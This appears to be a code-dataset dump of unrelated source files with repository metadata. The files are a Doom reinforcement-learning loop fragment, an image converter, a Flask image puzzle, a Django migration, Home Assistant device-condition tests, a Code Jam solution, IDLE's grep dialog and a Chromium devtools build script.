print("Episode Finish ", misc)
game.new_episode("./episode_rec/ep" + str(episode_co) + "_rec.lmp")
episode_co += 1
game_state = game.get_state()
misc = game_state.game_variables
x_t1 = game_state.screen_buffer
x_t1 = game_state.screen_buffer
misc = game_state.game_variables
x_t1 = preprocessImg(x_t1, size=(img_rows, img_cols))
x_t1 = np.reshape(x_t1, (1, img_rows, img_cols, 1))
s_t1 = np.append(x_t1, s_t[:, :, :, :3], axis=3)
r_t = agent.shape_reward(r_t, misc, prev_misc, t)
if (is_terminated):
life = 0
else:
life += 1
#update the cache
prev_misc = misc
# save the sample <s, a, r, s'> to the replay memory and decrease epsilon
agent.replay_memory(s_t, action_idx, r_t, s_t1, is_terminated, t)
# Do the training
if t > agent.observe and t % agent.timestep_per_train == 0:
loss = agent.train_replay()
losses_buffer.append({'loss': loss, 'episode': GAME})
s_t = s_t1
t += 1
# save progress every 10000 iterations
if t % 10000 == 0:
print("Now we save model")
agent.model.save_weights("./models/c51_ddqn.h5", overwrite=True)
# print info
state = ""
if t <= agent.observe:
state = "observe"
elif t > agent.observe and t <= agent.observe + agent.explore:
state = "explore"
else:
state = "train"
if is_terminated:
print("TIME", t, "/ GAME", GAME, "/ STATE", state, \
"/ EPSILON", agent.epsilon, "/ ACTION", action_idx, "/ REWARD", r_t, \
"/ LIFE", max_life, "/ LOSS", loss)
epsilon_buffer.append(agent.epsilon)
tot_reward_buffer.append(r_t)
# Save Agent's Performance Statistics
if GAME % agent.stats_window_size == 0 and t > agent.observe:
print("Update Rolling Statistics")
agent.mavg_score.append(np.mean(np.array(life_buffer)))
agent.var_score.append(np.var(np.array(life_buffer)))
agent.mavg_ammo_left.append(np.mean(np.array(ammo_buffer)))
agent.mavg_kill_counts.append(np.mean(np.array(kills_buffer)))
mavg_tot_rewards.append(np.mean(np.array(tot_reward_buffer)))
# Reset rolling stats buffer
life_buffer, ammo_buffer, kills_buffer = [], [], []
# Write Rolling Statistics to file
with open("./c51_ddqn_stats.txt", "w") as stats_file:
stats_file.write('Game: ' + str(GAME) + '\n')
stats_file.write('Max Score: ' + str(max_life) + '\n')
stats_file.write('mavg_score: ' + str(agent.mavg_score) + '\n')
stats_file.write('var_score: ' + str(agent.var_score) + '\n')
stats_file.write('mavg_ammo_left: ' + str(agent.mavg_ammo_left) + '\n')
stats_file.write('mavg_kill_counts: ' + str(agent.mavg_kill_counts) + '\n')
stats_file.write('mavg_rewards: ' + str(mavg_tot_rewards) + "\n")
with open("./ddqn_pr_steps_stats" + str(GAME) + ".pickle",
'wb') as handle:
pickle.dump(stats_store.append(
{'game': GAME, 'max_score': max_life,
'mavg_score': agent.mavg_score,
'var_score': agent.var_score,
'mavg_ammo_left': agent.mavg_ammo_left,
'mavg_kill_counts': agent.mavg_kill_counts,
'mavg_tot_rewards': mavg_tot_rewards}), handle,
protocol=pickle.HIGHEST_PROTOCOL)
with open("./buffer_dic_data" + str(GAME) + ".pickle", 'wb') as handle:
pickle.dump(stats_store.append({'life_buffer': life_buffer,
'ammo_buffer': ammo_buffer,
'kills_buffer': kills_buffer,
'tot_reward_buffer': tot_reward_buffer,
'losses': losses_buffer,
'epsilon': epsilon_buffer}),
handle, protocol=pickle.HIGHEST_PROTOCOL) | [
"[email protected]"
] | |
44128fe6dc5acae5eb8b887074251d66121ca915 | fd1f0606ea14cfb69429430d4d8cb5a5a0616ee3 | /python_code/yolo/convert_to_jpg.py | e9816e8e62a6dc828bee1debc266feedf66b6dbb | [] | no_license | mukulbhave/viden | 4fbae0bbfefae2b7e35623de12123c4371037420 | 848b16fa32cd0f180ab80a98254edd2147ea3948 | refs/heads/master | 2023-06-01T16:29:40.131295 | 2021-06-16T10:37:17 | 2021-06-16T10:37:17 | 257,380,167 | 0 | 0 | null | 2021-06-01T16:53:22 | 2020-04-20T19:13:57 | Python | UTF-8 | Python | false | false | 1,146 | py | from PIL import Image
import os, sys,re , fnmatch
import numpy as np
import glob
input_path = "C:\\Users\\sudhir\\Downloads\\EngImg\\"
out="C:\\dataset\\viden_numberplates\\out\\"
def rename():
for index,item in enumerate(dirs):
if item.endswith(".xml"):
x=item.find('-')
print("Renaming "+item+" as "+out +item[x+1:])
#if os.path.isfile(path+item):
os.rename(path+item,out +item[x+1:])
def convert_png_to_jpg():
count = 1
for root, dirnames, filenames in os.walk(input_path):
print("processing: "+root)
for f_name in fnmatch.filter(filenames, '*.png'):
file_path=os.path.join(root, f_name)
print("reading file: "+file_path)
im = Image.open(file_path)
rgb_im = im.convert('RGB')
f_name=f_name.replace(".png",".jpg")
out_path= os.path.join(out, f_name)
print("saving: "+out_path)
rgb_im.save(out_path, 'JPEG', quality=90)
count+=1
print("Processed Files:"+str(count))
convert_png_to_jpg() | [
"[email protected]"
] | |
b7e02524df176839009c27ff8e612e57db07bef9 | 13f03eb35aeb306e0a33d67437993f849d5b0e8d | /CS110 Intro to Python/Project 2/project2 no extra credit.py | da45097dc3486773e6bfa601825fd80804437b4e | [] | no_license | jalague/Projects | cee07f49e41a33e9529317b6beace2bb7b56e1c6 | 5e1a15cdf10ff8f878474011a04868b15334aad5 | refs/heads/master | 2021-01-12T08:28:13.707957 | 2019-12-03T01:23:32 | 2019-12-03T01:23:32 | 76,586,724 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,488 | py | import flask
import PIL
from flask import request
from flask import redirect
from imageHelperFunctions import *
import os, os.path
app=flask.Flask(__name__)
def editImage(option,filename,newname):
im=openImageFile(filename)
w,h=size(im)
for i in range(0,h):
for j in range(0,w):
r,g,b= getPixel((j,i),im)
if option==1:
setPixel((j,i),im, (r*20,0,0))
elif option==2:
setPixel((j,i),im, (0,g*20,0))
elif option==3:
setPixel((j,i),im, (0,0,b*20))
#showImage(im)
saveImageFile(im,newname,"PNG")
@app.route('/')
def displayPuzzle():
print("In displayPuzzle")
if not os.path.exists('static/newimage1.png'):
editImage(1,"static/distortedImage1.png", "static/newimage1.png")
if not os.path.exists('static/newimage2.png'):
editImage(2,"static/distortedImage1.png", "static/newimage2.png")
if not os.path.exists('static/newimage3.png'):
editImage(3,"static/distortedImage1.png", "static/newimage3.png")
html=''
html+='<!DOCTYPE html>\n'
html+='<html>\n'
html+='<body>\n'
html+=" <h1>Image Puzzle</h1>\n"
html+=' <p1> Apply one of the operations below to the image, and see if you can guess what famous object is in the image! </p1>\n'
html+='<img src="/static/distortedImage1.png" alt="distortedImage1"style="width:1024px;height:683px" >\n'
html+='<br>\n'
html+='Pick an Operation:<br>\n'
html+='<form method="POST" action="/showimage">\n'
html+='<input type="radio" name="operation" value="red">Set blue and green pixels to 0 and multiple red ones by 20<br>\n'
html+='<input type="radio" name="operation" value="green">Set blue and red pixels to 0 and multiple green ones by 20<br>\n'
html+='<input type="radio" name="operation" value="blue">Set blue and green pixels to 0 and multiple red ones by 20<br>\n'
html+='<input type="submit" value="Apply Operations" />\n'
html+='</form>\n'
html+='</form>\n'
html+='</body>\n'
html+='</html>\n'
return html
@app.route("/showimage", methods=['POST'])
def showEditedimage():
html=''
html+='<!DOCTYPE html>\n'
html+='<html>\n'
html+='<body>\n'
operation=request.form["operation"]
if operation=="red":
html+='<img src="/static/newimage1.png" alt="newimage" style="width:1024px;height:683px" >\n'
elif operation=="green":
html+='<img src="/static/newimage2.png" alt="newimage" style="width:1024px;height:683px" >\n'
elif operation=="blue":
html+='<img src="/static/newimage3.png" alt="newimage" style="width:1024px;height:683px" >\n'
html+='<br>\n'
html += '<form method="POST" action="/guessImage">\n'
html += 'Enter your guess <input type="text" name="guess"/>\n'
html += '</form>\n'
html+='</form>\n'
html+='</body>\n'
html+='</html>\n'
return html
@app.route("/guessImage", methods=['POST'])
def guessImage():
guess=request.form["guess"]
if guess=="White House" or guess=="white house" or guess=="the white house" or guess=="The White House" or guess=="the White House":
return "Correct!"
else:
return redirect('/')
if __name__ == '__main__':
app.run()
| [
"[email protected]"
] | |
717a9d888661f024fbf061eb7916b15f9e48b045 | 77e9396349c6a41dfeec9e270aec37df5871b652 | /code/option2/sut_test.py | c8dfb9fca16c6263aa78dc96f2810518ee0f8cdb | [] | no_license | sryabkov/python_modules_vscode | b62682c465c2dca81749ec48bafb616cf99e59b4 | d1d88a0af55ba540d5e6ff230655a57723b9cb8b | refs/heads/master | 2020-04-24T06:30:56.350656 | 2019-02-21T00:08:26 | 2019-02-21T00:08:26 | 171,767,375 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 247 | py | """
Test for sut.py
"""
from .sut import some_method_that_returns_string
def test_some_method_that_returns_string():
assert some_method_that_returns_string() == "noop"
if __name__ == "__main__":
test_some_method_that_returns_string()
| [
"[email protected]"
] | |
3b93255b073c2a9385971e2b9e090d3cb24606ca | 22e4f8c3fd76f099ad05b8ea0e53366878358d44 | /oil_trading/data/prepare_bloomberg_data.py | 333c76de2173719dbaf37701e0db085f5be7f4dc | [
"MIT"
] | permissive | queiyanglim/trading_algorithm | 272762b97bb3ab15e8174b2cea529f8df525e705 | 959de9ecb503b9de97528e06e57d40382dec9a65 | refs/heads/master | 2021-02-17T23:44:54.909650 | 2021-01-21T15:37:14 | 2021-01-21T15:37:14 | 245,137,152 | 6 | 2 | null | null | null | null | UTF-8 | Python | false | false | 676 | py | import pandas as pd
def get_bbg_data():
""" Daily prices since 1990"""
path = "https://github.com/queiyanglim/trading_algorithm/raw/master/oil_trading/data/oil_prices.csv"
df_pull = pd.read_csv(path, header=[0], index_col = 0)
df_pull = df_pull[["CO1 Comdty", "CL1 Comdty"]]
df_pull.index.name = "timestamp"
df_pull = df_pull.rename(columns = {"CO1 Comdty": "brent",
"CL1 Comdty": "wti"})
df_pull.index = pd.to_datetime(df_pull.index, format = "%d/%m/%Y")
df = df_pull.copy()
df["spread"] = df.brent - df.wti
# df = df.tail(2000)
# df = np.log(df).diff()
df = df.dropna()
return df | [
"[email protected]"
] | |
26cf7f5c49e7790eba3ae1742d71f32697b120fb | fff114e3cb9568fd04e3ee3ccf4b8edac9aece81 | /djangoblog/blogapp/migrations/0004_gory.py | 077977c924d51289d1913c5381b2fee756863028 | [] | no_license | 15SaswatiSingh/Python-in-Django-Framwork-travel-and-tourism- | 1572a589e2ee93ff574ea8d5d68db7b77e34d02e | b4ae21ce2942c4a4db4524f6f164bb5b6f789c86 | refs/heads/master | 2023-03-16T01:57:15.486262 | 2019-03-01T11:23:39 | 2019-03-01T11:23:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 512 | py | # Generated by Django 2.1.3 on 2019-02-09 03:57
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blogapp', '0003_auto_20190209_0013'),
]
operations = [
migrations.CreateModel(
name='gory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
],
),
]
| [
"[email protected]"
] | |
12e031215e23497b73989ea4cf0808a1ec95f07e | 575ad5e7d90ae1c8121bcb8250cff94290e6ada8 | /Day3/fft1.py | e871f4320311f97675cb183a391145c391847372 | [] | no_license | sammita94/Image-Lab | 472aaa8db7b1fd71269450c99cb704bfd0a9f797 | a3c548ba23bf4da89220c503e7eacdea0a1e653c | refs/heads/master | 2020-07-23T05:49:57.441291 | 2016-11-16T04:27:12 | 2016-11-16T04:27:12 | 73,814,180 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 911 | py | """Code for Discrete Fourier Transform using numpy functions
"""
import cv2
import numpy as np
from matplotlib import pyplot as plt
img = cv2.imread('fft.jpg',0)
#Fourier Transform
f = np.fft.fft2(img)
#Shifting the DC component from top left to center
fshift = np.fft.fftshift(f)
#Finding the Magnitude Spectrum
magnitude_spectrum = 20*np.log(np.abs(fshift))
#Shifting the DC component back to the top left corner
f_ishift = np.fft.ifftshift(fshift)
#Inverse Fourier Transform
img_back = np.fft.ifft2(f_ishift)
img_back = np.abs(img_back)
plt.subplot(131),plt.imshow(img, cmap = 'gray')
plt.title('Input Image'), plt.xticks([]), plt.yticks([])
plt.subplot(132),plt.imshow(magnitude_spectrum, cmap = 'gray')
plt.title('Magnitude Spectrum'), plt.xticks([]), plt.yticks([])
plt.subplot(133),plt.imshow(img_back, cmap = 'gray')
plt.title('Image inverted'), plt.xticks([]), plt.yticks([])
plt.show()
| [
"[email protected]"
] | |
82792a3be9979e79865b11f08d068150204766e1 | 2c74bb301f1ed83b79254944183ac5a18a639fdf | /tests/components/select/test_device_condition.py | 7c1dc443e5626cdb246bbc9a3f633cbd756d466c | [
"Apache-2.0"
] | permissive | Adminiuga/home-assistant | 5bec93007ddac1a268cc359bf7e48530c5f73b38 | dcf68d768e4f628d038f1fdd6e40bad713fbc222 | refs/heads/dev | 2023-02-22T22:03:31.013931 | 2022-11-09T00:27:20 | 2022-11-09T00:27:20 | 123,929,062 | 5 | 4 | Apache-2.0 | 2023-02-22T06:14:31 | 2018-03-05T14:11:09 | Python | UTF-8 | Python | false | false | 8,288 | py | """The tests for Select device conditions."""
from __future__ import annotations
import pytest
import voluptuous_serialize
from homeassistant.components import automation
from homeassistant.components.device_automation import DeviceAutomationType
from homeassistant.components.select import DOMAIN
from homeassistant.components.select.device_condition import (
async_get_condition_capabilities,
)
from homeassistant.core import HomeAssistant, ServiceCall
from homeassistant.helpers import (
config_validation as cv,
device_registry,
entity_registry,
)
from homeassistant.helpers.entity import EntityCategory
from homeassistant.setup import async_setup_component
from tests.common import (
MockConfigEntry,
assert_lists_same,
async_get_device_automations,
async_mock_service,
mock_device_registry,
mock_registry,
)
@pytest.fixture
def device_reg(hass: HomeAssistant) -> device_registry.DeviceRegistry:
"""Return an empty, loaded, registry."""
return mock_device_registry(hass)
@pytest.fixture
def entity_reg(hass: HomeAssistant) -> entity_registry.EntityRegistry:
"""Return an empty, loaded, registry."""
return mock_registry(hass)
@pytest.fixture
def calls(hass: HomeAssistant) -> list[ServiceCall]:
"""Track calls to a mock service."""
return async_mock_service(hass, "test", "automation")
async def test_get_conditions(
hass: HomeAssistant,
device_reg: device_registry.DeviceRegistry,
entity_reg: entity_registry.EntityRegistry,
) -> None:
"""Test we get the expected conditions from a select."""
config_entry = MockConfigEntry(domain="test", data={})
config_entry.add_to_hass(hass)
device_entry = device_reg.async_get_or_create(
config_entry_id=config_entry.entry_id,
connections={(device_registry.CONNECTION_NETWORK_MAC, "12:34:56:AB:CD:EF")},
)
entity_reg.async_get_or_create(DOMAIN, "test", "5678", device_id=device_entry.id)
expected_conditions = [
{
"condition": "device",
"domain": DOMAIN,
"type": "selected_option",
"device_id": device_entry.id,
"entity_id": f"{DOMAIN}.test_5678",
"metadata": {"secondary": False},
}
]
conditions = await async_get_device_automations(
hass, DeviceAutomationType.CONDITION, device_entry.id
)
assert_lists_same(conditions, expected_conditions)
@pytest.mark.parametrize(
"hidden_by,entity_category",
(
(entity_registry.RegistryEntryHider.INTEGRATION, None),
(entity_registry.RegistryEntryHider.USER, None),
(None, EntityCategory.CONFIG),
(None, EntityCategory.DIAGNOSTIC),
),
)
async def test_get_conditions_hidden_auxiliary(
hass,
device_reg,
entity_reg,
hidden_by,
entity_category,
):
"""Test we get the expected conditions from a hidden or auxiliary entity."""
config_entry = MockConfigEntry(domain="test", data={})
config_entry.add_to_hass(hass)
device_entry = device_reg.async_get_or_create(
config_entry_id=config_entry.entry_id,
connections={(device_registry.CONNECTION_NETWORK_MAC, "12:34:56:AB:CD:EF")},
)
entity_reg.async_get_or_create(
DOMAIN,
"test",
"5678",
device_id=device_entry.id,
entity_category=entity_category,
hidden_by=hidden_by,
)
expected_conditions = [
{
"condition": "device",
"domain": DOMAIN,
"type": condition,
"device_id": device_entry.id,
"entity_id": f"{DOMAIN}.test_5678",
"metadata": {"secondary": True},
}
for condition in ["selected_option"]
]
conditions = await async_get_device_automations(
hass, DeviceAutomationType.CONDITION, device_entry.id
)
assert_lists_same(conditions, expected_conditions)
async def test_if_selected_option(
hass: HomeAssistant, calls: list[ServiceCall]
) -> None:
"""Test for selected_option conditions."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: [
{
"trigger": {"platform": "event", "event_type": "test_event1"},
"condition": [
{
"condition": "device",
"domain": DOMAIN,
"device_id": "",
"entity_id": "select.entity",
"type": "selected_option",
"option": "option1",
}
],
"action": {
"service": "test.automation",
"data": {
"result": "option1 - {{ trigger.platform }} - {{ trigger.event.event_type }}"
},
},
},
{
"trigger": {"platform": "event", "event_type": "test_event2"},
"condition": [
{
"condition": "device",
"domain": DOMAIN,
"device_id": "",
"entity_id": "select.entity",
"type": "selected_option",
"option": "option2",
}
],
"action": {
"service": "test.automation",
"data": {
"result": "option2 - {{ trigger.platform }} - {{ trigger.event.event_type }}"
},
},
},
]
},
)
# Test with non existing entity
hass.bus.async_fire("test_event1")
hass.bus.async_fire("test_event2")
await hass.async_block_till_done()
assert len(calls) == 0
hass.states.async_set(
"select.entity", "option1", {"options": ["option1", "option2"]}
)
hass.bus.async_fire("test_event1")
hass.bus.async_fire("test_event2")
await hass.async_block_till_done()
assert len(calls) == 1
assert calls[0].data["result"] == "option1 - event - test_event1"
hass.states.async_set(
"select.entity", "option2", {"options": ["option1", "option2"]}
)
hass.bus.async_fire("test_event1")
hass.bus.async_fire("test_event2")
await hass.async_block_till_done()
assert len(calls) == 2
assert calls[1].data["result"] == "option2 - event - test_event2"
async def test_get_condition_capabilities(hass: HomeAssistant) -> None:
"""Test we get the expected capabilities from a select condition."""
config = {
"platform": "device",
"domain": DOMAIN,
"type": "selected_option",
"entity_id": "select.test",
"option": "option1",
}
# Test when entity doesn't exists
capabilities = await async_get_condition_capabilities(hass, config)
assert capabilities
assert "extra_fields" in capabilities
assert voluptuous_serialize.convert(
capabilities["extra_fields"], custom_serializer=cv.custom_serializer
) == [
{
"name": "option",
"required": True,
"type": "select",
"options": [],
},
{
"name": "for",
"optional": True,
"type": "positive_time_period_dict",
},
]
# Mock an entity
hass.states.async_set("select.test", "option1", {"options": ["option1", "option2"]})
# Test if we get the right capabilities now
capabilities = await async_get_condition_capabilities(hass, config)
assert capabilities
assert "extra_fields" in capabilities
assert voluptuous_serialize.convert(
capabilities["extra_fields"], custom_serializer=cv.custom_serializer
) == [
{
"name": "option",
"required": True,
"type": "select",
"options": [("option1", "option1"), ("option2", "option2")],
},
{
"name": "for",
"optional": True,
"type": "positive_time_period_dict",
},
]
| [
"[email protected]"
] | |
8479fc36a34cd92829460ba09dac9233003f21e2 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_145/588.py | bc85913e20b14805e33519ef4c6568305d07637f | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,649 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
import math
def read(f):
n = int(f.readline().strip())
for i in xrange(n):
p, q = map(int, f.readline().strip().split('/'))
yield p, q
def main(f):
for i, (p, q) in enumerate(read(f)):
if 2 ** int(math.log(q) / math.log(2)) != q:
print("Case #{0}: impossible".format(i+1))
else:
n = int(math.ceil((math.log(q) - math.log(p)) / math.log(2)))
print("Case #{0}: {1}".format(i+1, n))
_input = """
5
1/2
3/4
1/4
2/23
123/31488
""".strip()
_output = """
Case #1: 1
Case #2: 1
Case #3: 2
Case #4: impossible
Case #5: 8
""".strip()
def test_main(compare=False):
import sys
from difflib import unified_diff
from StringIO import StringIO
if compare:
stdout = sys.stdout
sys.stdout = StringIO()
try:
main(StringIO(_input))
result = sys.stdout.getvalue().strip()
finally:
sys.stdout = stdout
print(result)
for line in unified_diff(result.splitlines(), _output.splitlines(),
'Output', 'Expect', lineterm=''):
print(line)
if result == _output:
print("OK")
else:
print("NG")
else:
main(StringIO(_input))
if __name__ == '__main__':
test = False
compare = False
if test:
test_main(compare)
else:
import sys
if len(sys.argv) > 1:
f = open(sys.argv[1])
main(f)
f.close()
else:
main(sys.stdin)
| [
"[email protected]"
] | |
041cf40053b8f029ba5b1f64754d2048cbb70f5e | 2af6a5c2d33e2046a1d25ae9dd66d349d3833940 | /res_bw/scripts/common/lib/idlelib/grepdialog.py | 05f4b74a7d37f75455c785428aa681b07d431a4b | [] | no_license | webiumsk/WOT-0.9.12-CT | e6c8b5bb106fad71b5c3056ada59fb1aebc5f2b2 | 2506e34bd6634ad500b6501f4ed4f04af3f43fa0 | refs/heads/master | 2021-01-10T01:38:38.080814 | 2015-11-11T00:08:04 | 2015-11-11T00:08:04 | 45,803,240 | 0 | 0 | null | null | null | null | WINDOWS-1250 | Python | false | false | 4,154 | py | # 2015.11.10 21:36:11 Střední Evropa (běžný čas)
# Embedded file name: scripts/common/Lib/idlelib/GrepDialog.py
import os
import fnmatch
import sys
from Tkinter import *
from idlelib import SearchEngine
from idlelib.SearchDialogBase import SearchDialogBase
def grep(text, io = None, flist = None):
root = text._root()
engine = SearchEngine.get(root)
if not hasattr(engine, '_grepdialog'):
engine._grepdialog = GrepDialog(root, engine, flist)
dialog = engine._grepdialog
searchphrase = text.get('sel.first', 'sel.last')
dialog.open(text, searchphrase, io)
class GrepDialog(SearchDialogBase):
title = 'Find in Files Dialog'
icon = 'Grep'
needwrapbutton = 0
def __init__(self, root, engine, flist):
SearchDialogBase.__init__(self, root, engine)
self.flist = flist
self.globvar = StringVar(root)
self.recvar = BooleanVar(root)
def open(self, text, searchphrase, io = None):
SearchDialogBase.open(self, text, searchphrase)
if io:
path = io.filename or ''
else:
path = ''
dir, base = os.path.split(path)
head, tail = os.path.splitext(base)
if not tail:
tail = '.py'
self.globvar.set(os.path.join(dir, '*' + tail))
def create_entries(self):
SearchDialogBase.create_entries(self)
self.globent = self.make_entry('In files:', self.globvar)
def create_other_buttons(self):
f = self.make_frame()
btn = Checkbutton(f, anchor='w', variable=self.recvar, text='Recurse down subdirectories')
btn.pack(side='top', fill='both')
btn.select()
def create_command_buttons(self):
SearchDialogBase.create_command_buttons(self)
self.make_button('Search Files', self.default_command, 1)
def default_command(self, event = None):
prog = self.engine.getprog()
if not prog:
return
path = self.globvar.get()
if not path:
self.top.bell()
return
from idlelib.OutputWindow import OutputWindow
save = sys.stdout
try:
sys.stdout = OutputWindow(self.flist)
self.grep_it(prog, path)
finally:
sys.stdout = save
def grep_it(self, prog, path):
dir, base = os.path.split(path)
list = self.findfiles(dir, base, self.recvar.get())
list.sort()
self.close()
pat = self.engine.getpat()
print 'Searching %r in %s ...' % (pat, path)
hits = 0
for fn in list:
try:
with open(fn) as f:
for lineno, line in enumerate(f, 1):
if line[-1:] == '\n':
line = line[:-1]
if prog.search(line):
sys.stdout.write('%s: %s: %s\n' % (fn, lineno, line))
hits += 1
except IOError as msg:
print msg
print 'Hits found: %s\n(Hint: right-click to open locations.)' % hits if hits else 'No hits.'
def findfiles(self, dir, base, rec):
try:
names = os.listdir(dir or os.curdir)
except os.error as msg:
print msg
return []
list = []
subdirs = []
for name in names:
fn = os.path.join(dir, name)
if os.path.isdir(fn):
subdirs.append(fn)
elif fnmatch.fnmatch(name, base):
list.append(fn)
if rec:
for subdir in subdirs:
list.extend(self.findfiles(subdir, base, rec))
return list
def close(self, event = None):
if self.top:
self.top.grab_release()
self.top.withdraw()
if __name__ == '__main__':
import unittest
unittest.main('idlelib.idle_test.test_grep', verbosity=2, exit=False)
# okay decompyling c:\Users\PC\wotsources\files\originals\res_bw\scripts\common\lib\idlelib\grepdialog.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2015.11.10 21:36:11 Střední Evropa (běžný čas)
| [
"[email protected]"
] | |
a4de72f9bc8c298600db4419ce1778b70f3c07b5 | 89dedd7f3c7acc81d12e2bcb2e716f9af9e5fa04 | /third_party/WebKit/Source/devtools/scripts/concatenate_application_code.py | e6984e04864e14767f6fd64ff23f1ddfb871c822 | [
"BSD-3-Clause",
"LGPL-2.0-or-later",
"GPL-1.0-or-later",
"MIT",
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer",
"LGPL-2.1-only",
"GPL-2.0-only",
"LGPL-2.0-only",
"BSD-2-Clause",
"LicenseRef-scancode-other-copyleft"
] | permissive | bino7/chromium | 8d26f84a1b6e38a73d1b97fea6057c634eff68cb | 4666a6bb6fdcb1114afecf77bdaa239d9787b752 | refs/heads/master | 2022-12-22T14:31:53.913081 | 2016-09-06T10:05:11 | 2016-09-06T10:05:11 | 67,410,510 | 1 | 3 | BSD-3-Clause | 2022-12-17T03:08:52 | 2016-09-05T10:11:59 | null | UTF-8 | Python | false | false | 9,961 | py | #!/usr/bin/env python
#
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Release:
- Concatenates autostart modules, application modules' module.json descriptors,
and the application loader into a single script.
- Builds app.html referencing the application script.
Debug:
- Copies the module directories into their destinations.
- Copies app.html as-is.
"""
from cStringIO import StringIO
from os import path
from os.path import join
from modular_build import read_file, write_file, bail_error
import copy
import modular_build
import os
import re
import shutil
import sys
try:
import simplejson as json
except ImportError:
import json
import rjsmin
def resource_source_url(url):
return '\n/*# sourceURL=' + url + ' */'
def minify_js(javascript):
return rjsmin.jsmin(javascript)
def concatenated_module_filename(module_name, output_dir):
return join(output_dir, module_name + '/' + module_name + '_module.js')
def symlink_or_copy_file(src, dest, safe=False):
if safe and path.exists(dest):
os.remove(dest)
if hasattr(os, 'symlink'):
os.symlink(src, dest)
else:
shutil.copy(src, dest)
def symlink_or_copy_dir(src, dest):
if path.exists(dest):
shutil.rmtree(dest)
for src_dir, dirs, files in os.walk(src):
subpath = path.relpath(src_dir, src)
dest_dir = path.normpath(join(dest, subpath))
os.mkdir(dest_dir)
for name in files:
src_name = join(os.getcwd(), src_dir, name)
dest_name = join(dest_dir, name)
symlink_or_copy_file(src_name, dest_name)
class AppBuilder:
def __init__(self, application_name, descriptors, application_dir, output_dir):
self.application_name = application_name
self.descriptors = descriptors
self.application_dir = application_dir
self.output_dir = output_dir
def app_file(self, extension):
return self.application_name + '.' + extension
def core_resource_names(self):
result = []
for module in self.descriptors.sorted_modules():
if self.descriptors.application[module].get('type') != 'autostart':
continue
resources = self.descriptors.modules[module].get('resources')
if not resources:
continue
for resource_name in resources:
result.append(path.join(module, resource_name))
return result
# Outputs:
# <app_name>.html
# <app_name>.js
# <module_name>_module.js
class ReleaseBuilder(AppBuilder):
def __init__(self, application_name, descriptors, application_dir, output_dir):
AppBuilder.__init__(self, application_name, descriptors, application_dir, output_dir)
def build_app(self):
if self.descriptors.has_html:
self._build_html()
self._build_app_script()
for module in filter(lambda desc: (not desc.get('type') or desc.get('type') == 'remote'), self.descriptors.application.values()):
self._concatenate_dynamic_module(module['name'])
def _build_html(self):
html_name = self.app_file('html')
output = StringIO()
with open(join(self.application_dir, html_name), 'r') as app_input_html:
for line in app_input_html:
if '<script ' in line or '<link ' in line:
continue
if '</head>' in line:
output.write(self._generate_include_tag(self.app_file('js')))
output.write(line)
write_file(join(self.output_dir, html_name), output.getvalue())
output.close()
def _build_app_script(self):
script_name = self.app_file('js')
output = StringIO()
self._concatenate_application_script(output)
write_file(join(self.output_dir, script_name), minify_js(output.getvalue()))
output.close()
def _generate_include_tag(self, resource_path):
if (resource_path.endswith('.js')):
return ' <script type="text/javascript" src="%s"></script>\n' % resource_path
else:
assert resource_path
def _release_module_descriptors(self):
module_descriptors = self.descriptors.modules
result = []
for name in module_descriptors:
module = copy.copy(module_descriptors[name])
module_type = self.descriptors.application[name].get('type')
# Clear scripts, as they are not used at runtime
# (only the fact of their presence is important).
resources = module.get('resources', None)
if module.get('scripts') or resources:
if module_type == 'autostart':
# Autostart modules are already baked in.
del module['scripts']
else:
# Non-autostart modules are vulcanized.
module['scripts'] = [name + '_module.js']
# Resources are already baked into scripts.
if resources is not None:
del module['resources']
result.append(module)
return json.dumps(result)
def _write_module_resources(self, resource_names, output):
for resource_name in resource_names:
resource_name = path.normpath(resource_name).replace('\\', '/')
output.write('Runtime.cachedResources["%s"] = "' % resource_name)
resource_content = read_file(path.join(self.application_dir, resource_name)) + resource_source_url(resource_name)
resource_content = resource_content.replace('\\', '\\\\')
resource_content = resource_content.replace('\n', '\\n')
resource_content = resource_content.replace('"', '\\"')
output.write(resource_content)
output.write('";\n')
def _concatenate_autostart_modules(self, output):
non_autostart = set()
sorted_module_names = self.descriptors.sorted_modules()
for name in sorted_module_names:
desc = self.descriptors.modules[name]
name = desc['name']
type = self.descriptors.application[name].get('type')
if type == 'autostart':
deps = set(desc.get('dependencies', []))
non_autostart_deps = deps & non_autostart
if len(non_autostart_deps):
bail_error('Non-autostart dependencies specified for the autostarted module "%s": %s' % (name, non_autostart_deps))
output.write('\n/* Module %s */\n' % name)
modular_build.concatenate_scripts(desc.get('scripts'), join(self.application_dir, name), self.output_dir, output)
else:
non_autostart.add(name)
def _concatenate_application_script(self, output):
runtime_contents = read_file(join(self.application_dir, 'Runtime.js'))
runtime_contents = re.sub('var allDescriptors = \[\];', 'var allDescriptors = %s;' % self._release_module_descriptors().replace('\\', '\\\\'), runtime_contents, 1)
output.write('/* Runtime.js */\n')
output.write(runtime_contents)
output.write('\n/* Autostart modules */\n')
self._concatenate_autostart_modules(output)
output.write('/* Application descriptor %s */\n' % self.app_file('json'))
output.write('applicationDescriptor = ')
output.write(self.descriptors.application_json())
output.write(';\n/* Core resources */\n')
self._write_module_resources(self.core_resource_names(), output)
output.write('\n/* Application loader */\n')
output.write(read_file(join(self.application_dir, self.app_file('js'))))
def _concatenate_dynamic_module(self, module_name):
module = self.descriptors.modules[module_name]
